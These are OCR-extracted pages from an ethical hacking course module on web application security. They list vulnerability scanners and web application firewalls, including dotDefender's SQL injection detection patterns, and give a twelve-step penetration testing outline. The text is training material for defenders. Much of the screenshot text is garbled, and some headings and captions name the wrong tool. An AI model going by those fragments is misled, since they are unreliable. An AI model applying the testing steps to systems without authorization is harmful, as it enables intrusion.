Sw Mjojo , .. a‫׳‬T»>‫«־‬rh
i>
5'.«U.» 1•S'.ateiSca'1-W h brae a
http://nstalker.com
J N-Stalker Web Application
Security Scanner is an effective
suite of web security
assessment checks to enhance
the overall security of web
applications against a wide
range of vulnerabilities and
sophisticated hacker attacks
J It contains all web security
assessment checks such as:
e Code injection
» Cross-Site scripting
e Parameter tampering
« Web server vulnerabilities
Copyright © by EC-Gauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
f j H ^ W e b A p p l i c a t i o n S e c u r i t y T o o l : N ‫־‬ S t a l k e r W e b
_ A p p l i c a t i o n S e c u r i t y S c a n n e r
S o u r c e : h t t p : / / n s t a l k e r . c o m
N - S t a l k e r W e b A p p l i c a t i o n S e c u r i t y S c a n n e r p r o v i d e s a n e f f e c t i v e s u i t e o f w e b s e c u r i t y
a s s e s s m e n t c h e c k s t o e n h a n c e t h e o v e r a l l s e c u r i t y o f y o u r w e b a p p l i c a t i o n s a g a i n s t a w i d e
r a n g e o f v u l n e r a b i l i t i e s a n d s o p h i s t i c a t e d h a c k e r a t t a c k s . It a l s o a l l o w s y o u t o c r e a t e y o u r o w n
a s s e s s m e n t p o l i c i e s a n d r e q u i r e m e n t s , e n a b l i n g a n e f f e c t i v e w a y t o m a n a g e y o u r a p p l i c a t i o n ' s
SDLC, i n c l u d i n g t h e ab il it y t o c o n t r o l i n f o r m a t i o n e x p o s u r e , d e v e l o p m e n t f l a w s , i n f r a s t r u c t u r e
i s s u e s , a n d r e a l s e c u r i t y v u l n e r a b i l i t i e s t h a t c a n b e e x p l o r e d b y e x t e r n a l a g e n t s . It c o n t a i n s all
w e b s e c u r i t y a s s e s s m e n t c h e c k s s u c h a s c o d e i n j e c t i o n , c r o s s - s i t e s c r i p t i n g , p a r a m e t e r
t a m p e r i n g , w e b s e r v e r v u l n e r a b i l i t i e s , e t c .

T ON -S ta k e r W e b A p p lic a tio n S e curity Scanner 2012 - Free E d itio n
N-Stakm Scanner
Start Scan
Threads •
.En^na ft Crawler Settnga * :
:: Cncodc UR1(PS) Ef‫־‬w G tftrjj J ‫־‬I ControlOptons.
Start Proxy URLRestriction Settings 1 ‫־‬
• d o t* Settlor!
8 :
Seaton Mgtr* £ Fftera ‫״‬
Tnecut 15 t | DetUS MTTR • _ 1FPKeyword F*er
session Control Threads control spider control 1‫־‬aise-P0s*ve Control
03
high 10) Ni l (9) Low (1) inro (2)
rutwort *
Bytes Sent 901.526
6vies Received 2.029 110
A *0 Resconse Time 3525 ms
avq Transref Rite 1.752 88 kb/s
Reajest^Wrute 731 00 reo/mn
* ConplK*
N Sp11»r
0 7 ‫׳‬MS Dm*(
^ Co«o.«ed + (
Irto N (
ScanSessba __
Star; Tme Dc2C.2312 3-*:3©:53
CHeera 4 Mr jte3
Spider £ »‫י‬9‫י‬ ♦ 8
Crawed URLs 15
Crawled boss 1
Defaui Paje Sz t 56.117 Dries
ScmEngoe s
To;® Recues3 2926
Fated Requests 0
Attacks Serf 315
*04 Errors 2617
30? Redreeten 0
f t Scanner
a Dashboard
5)SitaSequance
J j Allowed Hoste
%.Rejected hosts
C i Oojects
Jjl Ccckes
(11)-Scrpts
(11)Mp Comments
(5)n Web Forms
E-tnats)‫ר־■־‬
(1)j p Broten pages
Hidden FtekJs
1)Information Leakage
0/'jnerablities
/200)+(J ht1p//l0
: Mtp:i/10.0.0-2/
Status. N>Staker Scanner season is being ctosed.. [Dashboard Thread)
FIGURE 13.65: N -Stalker W eb A p p lica tio n S ecurity Scanner Tool Screenshot

E H
W e b A p p l i c a t i o n S e c u r i t y T o o l :
V a m p i r e S c a n
VampireScan allow s users to te st th e ir ow n Cloud and
W eb applications fo r basic attacks and receive
L actionable results all w ith in th e ir ow n W eb portal
V a m p i r e S c a n
F eatu res
P rotect y o u r w e bsite fro m
hackers
e Scan and p ro te c t yo u r
in fra stru ctu re and w eb
a pp lica tions fro m cyber-
thre ats
© Give you direct,
a ction able insight on
high, m edium , and lo w
risk vulnerabilities
e
http://www.vampiretech.com
^ W e b A p p l i c a t i o n S e c u r i t y T o o l : N - S t a l k e r W e b
0 , . A p p l i c a t i o n S e c u r i t y S c a n n e r
S o u r c e : h t t p : / / w w w . v a m p i r e t e c h . c o m
V a m p i r e S c a n a l l o w s u s e r s t o t e s t t h e i r o w n C l o u d a n d W e b a p p l i c a t i o n s f o r b a s i c a t t a c k s
a n d r e c e i v e a c t i o n a b l e r e s u l t s all w i t h i n t h e i r o w n W e b p o r t a l . It c a n p r o t e c t y o u r w e b s i t e
f r o m h a c k e r s . T h is t o l c a n s c a n a n d p r o t e c t y o u r i n f r a s t r u c t u r e a n d w e b a p p l i c a t i o n s f r o m
c y b e r - t h r e a t s a n d c a n a l s o g i v e y o u d i r e c t , a c t i o n a b l e i n s i g h t o n h ig h , m e d i u m , a n d l o w risk
v u l n e r a b i l i t i e s

1 Summary
0
0
$0.00
Statistics
Queued Scam
Scans h Progress
Accoutt Balance
Unused Services
Expiring Unused Services
0
S ecurity Grades
A
B
C
O I
F
Recent A ctivity
Status Wrt Site URl Drvnplion Smncr latr*t Re*uft%
Q ow Runtw Rev** Grade HARM
V«*c
Vuln.
M/M/l Previous Scam
scanteil? QwSan HtathOeck 3/28/2012 2*2 PM mm 2960 6/2/0
%can»e*11 SMf 3/27/2012 2:17 PM mm 289• 193/214/271
scan!e*M •roftW 3/24/2012 •:12 AM mm 2314 124/148/113
*cant**11 M#a*rvO>eA 3/13/2012 1053 AM 4370 12/1/0
scanle*l? SMr 12/1S/20U 5:18PM mm 14634 44/42/65 &M Htory
© * 4 ? * • Of I » >‫׳‬
Show. S 10 20 SO 100 200
FIGURE 13.66: N -S talker W eb A p p lica tio n S ecurity Scanner Tool Screenshot
Module 13 Page 1949

Web Application Security Tools C E H
W e b s e c u rify
h t t p : / / w w w . w e b s e c u rify .c o m
X5s
h t t p : / / w w w .cas ab a. co m
R a tp ro x y
h t tp : //c o d e , g o og le, com
N e tB ru te
h t t p : / / w w w .ra w lo g ic . com
W—hi
WSSA - W e b Site S e cu rity
S canning Service
' h ttp s ://s e c u re .b e y o n d s e c u rity .c o m
f t .
V
I H L T S a n d c a tM in i
h ttp ://w w w .s y h u n t.c o m
SecuBat V u ln e ra b ility Scanner
h t tp ://s e c u b a t. cod ep ie x. co m
SPIKE P roxy
h t tp : //w w w . im m u n ity sec. co m
OWASP ZAP
h t tp : //w w w . o w a sp . o rg
skip fish
| ^___j h ttp ://c o d e .g o o g le .c o m
Copyright© by EC-Cauncil.All Rights Reserved. Reproduction isStrictly Prohibited.
W e b A p p l i c a t i o n S e c u r i t y T o o l s
W e b a p p l i c a t i o n s e c u r i t y t o o l s a r e w e b a p p l i c a t i o n s e c u r i t y a s s e s s m e n t s o f t w a r e
d e s i g n e d t o t h o r o u g h l y a n a l y z e t o d a y ' s c o m p l e x w e b a p p l i c a t i o n s w i t h t h e a i m o f f i n d i n g
e x p l o i t a b l e SQL i n j e c t i o n , XSS v u l n e r a b i l i t i e s , e t c . T h e s e t o o l s d e l i v e r s c a n n i n g c a p a b i l i t i e s ,
b r o a d a s s e s s m e n t c o v e r a g e , a n d a c c u r a t e w e b a p p l i c a t i o n s c a n n i n g r e s u l t s . C o m m o n l y u s e d
w e b a p p l i c a t i o n s e c u r i t y t o o l s a r e li s t e d a s f o l l o w s :
Q S a n d c a t M i n i a v a i l a b l e a t h t t p : / / w w w . s y h u n t . c o m
0 O W A S P ZAP a v a i l a b l e a t h t t p : / / w w w . o w a s p . o r g
6 s k i p f is h a v a i l a b l e a t h t t p : / / c o d e . g o o g l e . c o m
Q S e c u B a t V u l n e r a b i l i t y S c a n n e r a v a i l a b l e a t h t t p : / / s e c u b a t . c o d e p l e x . c o m
© SPIKE P r o x y a v a i l a b l e a t h t t p : / / w w w . i m m u n i t v s e c . c o m
0 W e b s e c u r i f y a v a i l a b l e a t h t t p : / / w w w . w e b s e c u r i f y . c o m
© N e t B r u t e a v a i l a b l e a t h t t p : / / w w w . r a w l o g i c . c o m
Q X5s a v a i l a b l e a t h t t p : / / w w w . c a s a b a . c o m
© W S S A ‫־‬ W e b S it e S e c u r i t y S c a n n i n g S e r v i c e a v a i l a b l e a t
h t t p s : / / s e c u r e . b e v o n d s e c u r i t v . c o m

Web Application Security Tools
( C o n t ’d )
C E H
i p i S yh u n t H yb rid
h ttp ://w w w .s y h u n t. co m
1
M E x p lo it-M e
h ttp :/'/la b s , s e c u rity c o m p a s s .c o m
(P "
W SD igger
h t tp : //w w w .m ca fe e . co m
W a p iti
h t tp : //w a p iti,so u rc e fo rg e , n e t
W e b W a tc h B o t
h t tp : //w w w . e x c la m a tio n s o ft. co m
f r ! K - KeepNI
h t t p : / / w w w .ke e p n i. com
G ra b b e r A ra ch n i
h ttp ://r g a u c h e r .in fo ‫ם‬□□ h ttp ://a ra c h n i-s c a n n e r.co m
Vega
- ‫ד‬ ‫ח‬ h t tp : //w w w .s u b g ra p h . com
xsss
h t tp : //w w w .s ven . de
W e b A p p l i c a t i o n S e c u r i t y T o o l s ( C o n t ’ d )
In a d d i t i o n t o t h e p r e v i o u s l y m e n t i o n e d w e b a p p l i c a t i o n s e c u r i t y t o o l s , t h e r e a r e f e w
m o r e t o o l s t h a t c a n b e u s e d t o a s s e s s t h e s e c u r i t y o f w e b a p p l i c a t i o n s :
© W a p i t i a v a i l a b l e a t h t t p : / / w a p i t i . s o u r c e f o r g e . n e t
© W e b W a t c h B o t a v a i l a b l e a t h t t p : / / w w w . e x c l a m a t i o n s o f t . c o m
© K e e p N I a v a i l a b l e a t h t t p : / / w w w . k e e p n i . c o m
© G r a b b e r a v a i l a b l e a t h t t p : / / r g a u c h e r . i n f o
© XSSS a v a i l a b l e a t h t t p : / / w w w . s v e n . d e
© S v h u n t H y b r id a v a i l a b l e a t h t t p : / / w w w . s v h u n t . c o m
© E x p l o i t - M e a v a i l a b l e a t h t t p : / / l a b s . s e c u r i t y c o m p a s s . c o m
© W S D i g g e r a v a i l a b l e a t h t t p : / / w w w . m c a f e e . c o m
© A r a c h n i a v a i l a b l e a t h t t p : / / a r a c h n i - s c a n n e r . c o m
© V e g a a v a i l a b l e a t h t t p : / / w w w . s u b g r a p h . c o m

Exam 312-50 Certified Ethical HackerEthical Hacking and Countermeasures
C E H
Urt1fw4 ilhiul lUtbM
Web Application Firew all:
dotDefender
*<hc.»‫*׳‬«»vew *ovomrs*‫מיי‬‫י׳‬AMe
d tDefender
i 9 ‫־‬SQL Infection
awM* ypev. sol rt-« «
w Suspect Single Quote (Safe) □
‫מ‬ Pattern = Pattern □
Classic SQL Comment ‫’־־‬ D
w SQL Comments Q
Q ‘Union Select’ Statement ‫ם‬
W ‘Select Version' Statement Q
P SQL CHARType ‫ם‬
W SQL SYSCommands □
W IS SRVROLEMEMBERfollowed by ( ‫ם‬
‫ק‬ MS SQL Specific SQL Injection
cbtOefrndEr(329daysfcft)
ilU EventView?(Locrf)
_tl‫י‬‫ו‬‫׳‬‫ו‬InternetIrrfonriaaarSer*
4> GbbalSettngs
□ {2) De^aiJtScantyFtoSep-otec
ServerMa*ng
[£ Lpka: Fok:»5‫־‬
0 £‫כ‬ Patterns
ffl fel WhalBt(Perm!*dAs
ij £2)Pararoc
ijfgtEncotlnQ
[fl BjffwOi'eHbn
a £21SQLlr!j*ct>cr
Lae‫׳‬ cHhed
CB .71‫־‬CT0B-5WSowanc
‫י^ג‬,*CUc7t
5•‫*יי‬‫י־‬(c7‫ש‬
m#nfll*e<‫״‬Ltl uJ)R«no(e ca
)!(Q) Ced*mrrten
1ar*!‫־‬m &vmdow*:»rrner
HJ ^ W*l Vtwna
ID ^2)»*a!hlnty*rran rf*e‫־‬..‫־‬creataw‫י‬9‫«ימ‬(a‫ן‬UU
U
‫ז‬<]<:*•<flj*e
:Jw LVaUi:‫*זיל‬AfttnaFTP‫ן‬.
d o tD e fe n d e r is a s o ftw a re
based W eb A p p lic a tio n
Firew all
It com ple m en ts the
n e tw o rk fire w a ll, IPS and
o th e r netw o rk-based
In te rn e t security products
It inspects the HTTP/HTTPS
tra ffic fo r suspicious
behavior
It d etects and blocks SQL
in je c tio n attacks
http://www.opplicure.com
5 5 ^ W e b A p p l i c a t i o n F i r e w a l l : d o t D e f e n d e r
S o u r c e : h t t p : / / w w w . a p p l i c u r e . c o m
d o t D e f e n d e r ™ is a s o f t w a r e - b a s e d w e b a p p l i c a t i o n f i r e w a l l t h a t p r o v i d e s a d d i t i o n a l w e b s i t e
s e c u r i t y a g a i n s t m a l i c i o u s a t t a c k s a n d w e b s i t e d e f a c e m e n t . It p r o t e c t s y o u r w e b s i t e f r o m
m a l i c i o u s a t t a c k s . W e b a p p l i c a t i o n a t t a c k s s u c h a s SQL i n j e c t i o n , p a t h t r a v e r s a l , c r o s s - s i t e
s c r i p t i n g , a n d o t h e r a t t a c k s l e a d i n g t o w e b s i t e d e f a c e m e n t c a n b e p r e v e n t e d w i t h d o t D e f e n d e r .
It c o m p l e m e n t s t h e n e t w o r k f i r e w a l l , IPS, a n d o t h e r n e t w o r k - b a s e d I n t e r n e t s e c u r i t y p r o d u c t s .
It i n s p e c t s H T T P /H T T P S tr a f f i c f o r s u s p i c i o u s b e h a v i o r .

-Iffl Xl
d t D e f e n d e r ”‫׳‬
■1-1 ■‫י‬ SQL Injacfion
C h o o s e w h ic h ty p e o f S Q L Injection a tta ct-s to n te r c e p t
17 Suspect Single Quote (Safe) □
Pattern = Pattern Q
‫קו‬ -■‫י‬,Classic SQL Comment □
F SQL Comments D
17 ‘Union Select’ Statement D
17 ‘Select Version‫׳‬ Statem ent ‫ם‬
17 SQL CHAR Type D
17 SQL SYS Commands D
17 IS_SRVROLEMEMBER follow ed by ( D
17 MS SQL Specific SQL Injection 0
flle Action view Favorites V/hdow Hrlp
» ■» IB I ►■ _________
^ dotOtfender (329 daye leH)
FI b ; Event Vic•no (loid)
Id n Internet Jrforrnaton Servictc (
O license
A cscbal s#t1!rgs
0 { f Default Security FYofile(Protec
J ] server Ma?icrc
UploadFolders
0 £‫ב‬ Patterns
0 lAiWte#*t (Permitted Ac<
0 Ls? Parcnad
0 Encoding
0 Buffer Overflow
B IGS SQLInjection
User Defired
t j Best Practices
0 ££ Cross-Site Sanptrg
0 CookieManipulation
0 f e Path Traversal
₪ 62 Probnc
HifeRerotecormardExec
0 Code Inaction
ra LZ Windows Directoriesan
0 XM. Schema
0 LZ XPoth Injection
0 XPath CrocsSte Scroa
0 Soroturea
(UseD efa u lt)
Q Athena HT Ste (LtecDefault)
FIGURE 13.67: d o tD e fe n d e r

Web Application Firew all:
ServerDefender VP c
(•rtifwd
E H
ItkMJl lUckM
ServerDefender VP W eb ap plication fire w a ll is designed to provide security against w e b attacks
SefverDefender VP Settings Manager
http://www.port80software.com
p o rt8 0
l-ojt <'adaton BufferOverflow |Resources | Me*cds JU3 |RieUpfea-s |Ectpmts
Common■p>r«3ts
SQLInjection
&Z|aoACfttJ«9teStTplng(>SS) MribicdKTWl_______ v_
Gcnenc]‫׳‬rut wrrtiratwn
OiNone
$l**Mun 0‫^נ‬. II. 12, H 31, 127, 175-223, 25$)
C)Extended (>, <,', ‫ו‬ ♦Mnmum
OPwanad (L*. M .1,] *M adid
W e b A p p l i c a t i o n F i r e w a l l : S e r v e r D e f e n d e r V P
§ Q i S o u r c e : h t t p : / / w w w . p o r t 8 0 s o f t w a r e . c o m
T h e S e r v e r D e f e n d e r VP w e b a p p l i c a t i o n f i r e w a l l is d e s i g n e d t o p r o v i d e s e c u r i t y a g a i n s t w e b
a t t a c k s . SDVP s e c u r i t y will p r e v e n t d a t a t h e f t a n d b r e a c h e s a n d s t o p u n a u t h o r i z e d s i t e
d e f a c e m e n t , file a l t e r a t i o n s , a n d d e l e t i o n s .
Module 13 Page 1955

ServerDefender VP Settings Manager
p o r t 8 0
• OFF • LOGONLY O ONProtection for Default Web Site is ON
4 : Sit*
| | Status
J Request
Mgmt
jfe/Resporse
Mgmt
/ ^ Session
Mgmt
E‫«״‬‫׳‬
Mgmt
Admir
• • Options
Input Vafcdation Birfer Overflow J Resources | Methods | URLs | File Uploads ] Exceptions
Generc Input Sanitization
O None
(§) [0-9, 11, 12, 14-31, 127,175-223, 255]
C Extended [>, <, ‫ך‬ + Mnmum
C Paranoid [|, +Extended
Samteation Action: Deny and Log
Apply ]
Fil• Configur# H#lp
s e rv e rd e fe n d e r VP
WEB APPLICATION FIREWALL
WIN-ETLRP50T7LB
m Defajlt Profile
J Default Web Site (Custom)
p o r t 8 0
• OFF •L O G ONLY 0 ONProtectionfor Gauntlet is ON
Show
Details
Enforcement Level
1 2 3 4 5
|G e n e rc P iiA c S ite * ]
Refresh
Site Status | Blocked IPs | Aierbng | Reporting |
ServerDefenderVP Statistics Snce 11/8/2011
Total Total Currently Total Currently Total
HTTP Sessions Active Blocked Blocked Error
Requests Created Sessions IPs IPs Count
26719 752 750 0 0 723
Error Statistics LogViewer
S*e 1 Total | 404 | SQL 1 XSS I Input I Cookie 1 Other |
Default Web. 7 0 0 0 3
Gauntlet
Administration
Assets
OK | Cancel | ApplyExpert View |
- f ServerDefender VP Settings Manager
M e Configure Help
se rverd e fe n de r VP
WEB APPLICATION FIREWALL
g REDBRICK
V Default Profile
V Default Web Site
Administration
Assets
FIGURE 13.68: S erverD efender VP

B a rracuda W e b A p p lic a tio n
F ire w a ll
h ttp s : // w w w . b a rra c u d a n e tw o rk s . co m
R adw a re 's A p p W a ll
‫□ו‬ h t t p : / / w w w .ra d w a re . co m
nss^l T h re a tS e n try I 3 H l S tin g ra y A p p lic a tio n F ire w a ll
1— j h t tp : //w w w .p riv a c y w a re , co m h t t p : / / w w w .riv e rb e d , com
'‫י־־‬-r
W
IB M S e cu rity A ppScan
h t t p : / / w w w -01. ib m . co m
Q u a lysG uard WAF
h t t p : / / w w w .q u a tys. com
T ru s tw a v e W e b D e fe n d
h ttp s : // w w w . tru s t w a v e , co m
C yb e ro a m 's W eb A p p lic a tio n
F ire w a ll
h t t p : / / w w w .c y b e ro a m , com
T h re a tR a d a r
h t t p : / / w w w .im p e rv a . co m
B !M o d S e c u rity
1—■ ‫ו‬ ‫י‬
J J h t tp : //w w w . m o d s e c u rity . o rg
‫ץ‬ W e b A p p l i c a t i o n F i r e w a l l s
y W e b a p p l i c a t i o n f i r e w a l l s s e c u r e w e b s i t e s , w e b a p p l i c a t i o n s , a n d w e b s e r v i c e s a g a i n s t
k n o w n a n d u n k n o w n a t t a c k s . T h e y p r e v e n t d a t a t h e f t a n d m a n i p u l a t i o n o f s e n s i t i v e c o r p o r a t e
a n d c u s t o m e r i n f o r m a t i o n . C o m m o n l y u s e d w e b a p p l i c a t i o n f i r e w a l l s a r e li s t e d a s f o l l o w s :
© R a d w a r e ' s A p p W a l l a v a i l a b l e a t h t t p : / / w w w . r a d w a r e . c o m
© T h r e a t S e n t r y a v a i l a b l e a t h t t p : / / w w w . p r i v a c y w a r e . c o m
© Q u a l y s G u a r d W A F a v a i l a b l e a t h t t p : / / w w w . q u a l y s . c o m
© T h r e a t R a d a r a v a i l a b l e a t h t t p : / / w w w . i m p e r v a . c o m
© M o d S e c u r i t y a v a i l a b l e a t h t t p : / / w w w . m o d s e c u r i t y . o r g
© B a r r a c u d a W e b A p p l i c a t i o n F ir e w a l l a v a i l a b l e a t h t t p s : / / w w w . b a r r a c u d a n e t w o r k s . c o m
© S t i n g r a y A p p l i c a t i o n F ir e w a ll a v a i l a b l e a t h t t p : / / w w w . r i v e r b e d . c o m
© IBM S e c u r i t y A p p S c a n a v a i l a b l e a t h t t p : / / w w w - 0 1 . i b m . c o m
© T r u s t w a v e W e b D e f e n d a v a i l a b l e a t h t t p s : / / w w w . t r u s t w a v e . c o m
© C y b e r o a m ' s W e b A p p l i c a t i o n F ir e w a l l a v a i l a b l e a t h t t p : / / w w w . c y b e r o a m . c o m

C E HM o d u le F lo w
W e b A p p C o n c e p t s
f a
W e b A p p T h r e a t s
* Q Q Q
S e c u r i t y T o o ls
* * S C o u n t e r m e a s u r e s
‫־‬ ‫־‬ ^ M o d u l e F l o w
As m e n t i o n e d p r e v i o u s l y , w e b a p p l i c a t i o n s a r e m o r e v u l n e r a b l e t o a t t a c k s . A t t a c k e r s
u s e w e b a p p l i c a t i o n s a s t h e s o u r c e s f o r s p r e a d i n g a t t a c k s b y t u r n i n g t h e m i n t o m a l i c i o u s
a p p l i c a t i o n s o n c e c o m p r o m i s e d . Y o u r w e b a p p l i c a t i o n m a y a l s o b e c o m e a v i c t i m o f s u c h
a t t a c k s . T h e r e f o r e , t o a v o i d t h i s s i t u a t i o n , y o u s h o u l d c o n d u c t p e n e t r a t i o n t e s t i n g in o r d e r t o
d e t e r m i n e t h e v u l n e r a b i l i t i e s b e f o r e t h e y a r e e x p l o i t e d b y r e a l a t t a c k e r s .
W e b A p p P e n T e s t i n g W e b A p p C o n c e p t s
m S e c u r i t y T o o l s W e b A p p T h r e a t s
lM C o u n t e r m e a s u r e s
* f f
^ H a c k i n g M e t h o d o l o g y
‫׳‬£ 3
W e b A p p l i c a t i o n H a c k i n g T o o l s

W e b a p p l i c a t i o n s c a n b e c o m p r o m i s e d in m a n y w a y s . T h is s e c t i o n d e s c r i b e s h o w t o c o n d u c t
w e b a p p l i c a t i o n p e n t e s t i n g a g a i n s t all p o s s i b l e k i n d s o f a t t a c k s .

Exam 312-50 Certified Ethical HackerEthical Hacking and Countermeasures
W eb A p p licatio n Pen Testing CEHUrtrfW* itfciul NmIm
J Web application pen testing is used to id e n tify, analyze, and re p o rt v u ln e ra b ilitie s such as inp u t validation,
buffe r overflow , SQL injection, bypassing authentication, code execution, etc. in a given application
J The best w ay to perform penetration testing is to conduct a series o f m ethodical and repeatable te s ts , and
to w o rk through all o f the d iffe re n t application vulnerabilities
Id e n tific a tio n o f Ports
Scan the ports to identify the associated running
services and analyze them through automated
or manual tests to find weaknesses
p -----------
s m m
1 http.‫/׳‬ !
□j V e rifica tio n o f V ulnerabilities
To exploit the vulnerability in order
to test and fix the issue
R em ediation o f V u ln e ra b ilitie s
To retest the solution against
vulnerability to ensure that it is
com pletely secure
| p ‫ך‬ ] W e b A p p l i c a t i o n P e n T e s t i n g
1 u r W e b a p p l i c a t i o n p e n t e s t i n g is d o n e t o d e t e c t v a r i o u s s e c u r i t y v u l n e r a b i l i t i e s a n d
a s s o c i a t e d risks. As a p e n t e s t e r , y o u s h o u l d t e s t y o u r w e b a p p l i c a t i o n f o r v u l n e r a b i l i t i e s s u c h a s
i n p u t v a l i d a t i o n , b u f f e r o v e r f l o w , SQL i n j e c t i o n , b y p a s s i n g a u t h e n t i c a t i o n , c o d e e x e c u t i o n , e t c .
T h e b e s t w a y t o c a r r y o u t a p e n e t r a t i o n t e s t is t o c o n d u c t a s e r i e s o f m e t h o d i c a l a n d r e p e a t a b l e
t e s t s , a n d t o w o r k t h r o u g h all o f t h e d i f f e r e n t a p p l i c a t i o n v u l n e r a b i l i t i e s .
W e b a p p l i c a t i o n p e n t e s t i n g h e l p s in:
© I d e n t i f i c a t i o n o f P o r t s : S c a n t h e p o r t s t o i d e n t i f y t h e a s s o c i a t e d r u n n i n g s e r v i c e s a n d
a n a l y z e t h e m t h r o u g h a u t o m a t e d o r m a n u a l t e s t s t o fi n d w e a k n e s s e s .
0 V e r i f i c a t i o n o f V u l n e r a b i l i t i e s : T o e x p l o i t t h e v u l n e r a b i l i t y in o r d e r t o t e s t a n d fix t h e
is s u e .
© R e m e d i a t i o n o f V u l n e r a b i l i t i e s : T o r e t e s t t h e s o l u t i o n a g a i n s t v u l n e r a b i l i t y t o e n s u r e
t h a t it is c o m p l e t e l y s e c u r e .

_ _
W e b A p p l i c a t i o n P e n T e s t i n g
( C o n t ’d )
C E H
START
W eb Services
Testing
AJAX Testing
V
In fo rm a tio n A u th o riza tio n
G athering Testing
v
------------------- * ---------------------
C onfiguration Business Logic
M anagem ent Testing Testing
9
------------------- * ---------------------
--------------------- ■---------------------
A u th e n tica tio n Data V alidation
Testing Testing
V
------------------- * ---------------------
Session D enial-of-Service
M anagem ent Testing Testing
W e b A p p l i c a t i o n P e n T e s t i n g ( C o n t ’ d )
T h e g e n e r a l s t e p s t h a t y o u n e e d t o f o l l o w t o c o n d u c t w e b a p p l i c a t i o n p e n e t r a t i o n
t e s t a r e li s t e d a s f o l l o w s . In a f u t u r e s e c t i o n , e a c h s t e p is e x p l a i n e d in d e t a i l .
S t e p 1: D e f i n i n g o b j e c t i v e
Y ou s h o u l d d e f i n e t h e a i m o f t h e p e n e t r a t i o n t e s t b e f o r e c o n d u c t i n g it. T his w o u l d h e l p y o u t o
m o v e in r i g h t d i r e c t i o n t o w a r d s y o u r a i m o f p e n e t r a t i o n t e s t .
S t e p 2: I n f o r m a t i o n g a t h e r i n g
Y ou s h o u l d g a t h e r a s m u c h i n f o r m a t i o n a s p o s s i b l e a b o u t y o u r t a r g e t s y s t e m o r n e t w o r k .
S t e p 3: C o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
M o s t w e b a p p l i c a t i o n a t t a c k s o c c u r b e c a u s e o f i m p r o p e r c o n f i g u r a t i o n . T h e r e f o r e , y o u s h o u l d
c o n d u c t c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g . T h is a l s o h e l p s y o u t o p r o t e c t a g a i n s t k n o w n
v u l n e r a b i l i t i e s b y in s t a l l i n g t h e l a t e s t u p d a t e s .
S t e p 4 : A u t h e n t i c a t i o n t e s t i n g s e s s i o n
T e s t t h e a u t h e n t i c a t i o n s e s s i o n t o u n d e r s t a n d t h e a u t h e n t i c a t i o n m e c h a n i s m a n d t o d e t e r m i n e
t h e p o s s i b l e e x p l o i t s in it.

S t e p 5: S e s s i o n m a n a g e m e n t t e s t i n g
P e r f o r m s e s s i o n m a n a g e m e n t t e s t i n g t o c h e c k y o u r w e b a p p l i c a t i o n a g a i n s t v a r i o u s a t t a c k s t h a t
a r e b a s e d o n s e s s i o n ID s u c h a s s e s s i o n h ij a c k in g , s e s s i o n f i x a t i o n , e t c .
S t e p 6: D e n i a l - o f - s e r v i c e t e s t i n g
S e n d a v a s t a m o u n t o f r e q u e s t s t o t h e w e b a p p l i c a t i o n u n til t h e s e r v e r g e t s s a t u r a t e d . A n a l y z e
t h e b e h a v i o r o f a p p l i c a t i o n w h e n t h e s e r v e r is s a t u r a t e d . In t h i s w a y y o u c a n t e s t y o u r w e b
a p p l i c a t i o n a g a i n s t d e n i a l - o f - s e r v i c e a t t a c k s .
S t e p 7: D a t a v a l i d a t i o n t e s t i n g
Failing t o a d o p t a p r o p e r d a t a v a l i d a t i o n m e t h o d is t h e c o m m o n s e c u r i t y w e a k n e s s o b s e r v e d in
m o s t w e b a p p l i c a t i o n s . T his m a y f u r t h e r l e a d t o m a j o r v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s .
H e n c e , b e f o r e a h a c k e r f i n d s t h o s e v u l n e r a b i l i t i e s a n d e x p l o i t s y o u r a p p l i c a t i o n , p e r f o r m d a t a
v a l i d a t i o n t e s t i n g a n d p r o t e c t y o u r w e b a p p l i c a t i o n .
S t e p 8: B u s i n e s s lo g i c t e s t i n g
W e b a p p l i c a t i o n s e c u r i t y f l a w s m a y b e p r e s e n t e v e n in b u s i n e s s logic. H e n c e , y o u s h o u l d t e s t
t h e b u s i n e s s logic f o r f l a w s . E x p lo i ti n g t h i s b u s i n e s s logic, a t t a c k e r s m a y d o s o m e t h i n g t h a t is
n o t a l l o w e d b y b u s i n e s s e s a n d it m a y s o m e t i m e s l e a d t o g r e a t f i n a n c i a l loss. T e s t i n g b u s i n e s s
logic f o r s e c u r i t y f l a w s r e q u i r e s u n c o n v e n t i o n a l t h i n k i n g .
S t e p 9: A u t h o r i z a t i o n t e s t i n g
A n a l y z e h o w a w e b a p p l i c a t i o n is a u t h o r i z i n g t h e u s e r a n d t h e n t r y t o fi n d a n d e x p l o i t t h e
v u l n e r a b i l i t i e s p r e s e n t in t h e a u t h o r i z a t i o n m e c h a n i s m .
S t e p 10 : W e b s e r v i c e s t e s t i n g
W e b s e r v i c e s u s e HTTP p r o t o c o l in c o n j u c t i o n w i t h SML, W SD L, SO AP, a n d UDDI t e c h n o l o g i e s .
T h e r e f o r e , w e b s e r v i c e s h a v e X M L / p a r s e r r e l a t e d v u l n e r a b i l i t i e s in a d d i t i o n t o SQL i n j e c t i o n ,
i n f o r m a t i o n d i s c l o s u r e , e t c . Y ou s h o u l d c o n d u c t w e b s e r v i c e s t e s t i n g t o d e t e r m i n e t h e
v u l n e r a b i l i t i e s o f w e b - b a s e d s e r v i c e s .
S t e p 11 : AJAX t e s t i n g
T h o u g h m o r e r e s p o n s i v e w e b a p p l i c a t i o n s a r e d e v e l o p e d u s i n g AJAX, it is likely a s v u l n e r a b l e a s
a t r a d i t i o n a l w e b a p p l i c a t i o n . T e s t i n g f o r AJAX is c h a l l e n g i n g b e c a u s e w e b a p p l i c a t i o n
d e v e l o p e r s a r e g i v e n full f r e e d o m t o d e s i g n t h e w a y o f c o m m u n i c a t i o n b e t w e e n c l i e n t a n d
s e r v e r .
S t e p 12 : D o c u m e n t all t h e f i n d i n g s
O n c e y o u c o n d u c t all t h e t e s t s m e n t i o n e d h e r e , d o c u m e n t all t h e f i n d i n g s a n d t h e t e s t i n g
t e c h n i q u e s e m p l o y e d a t e a c h s t e p . A n a l y z e t h e d o c u m e n t a n d e x p l a i n t h e c u r r e n t s e c u r i t y
p o s t u r e t o t h e c o n c e r n e d p a r t i e s a n d s u g g e s t h o w t h e y c a n e n h a n c e t h e i r s e c u r i t y .

I n f o r m a t i o n G a t h e r i n g C E H
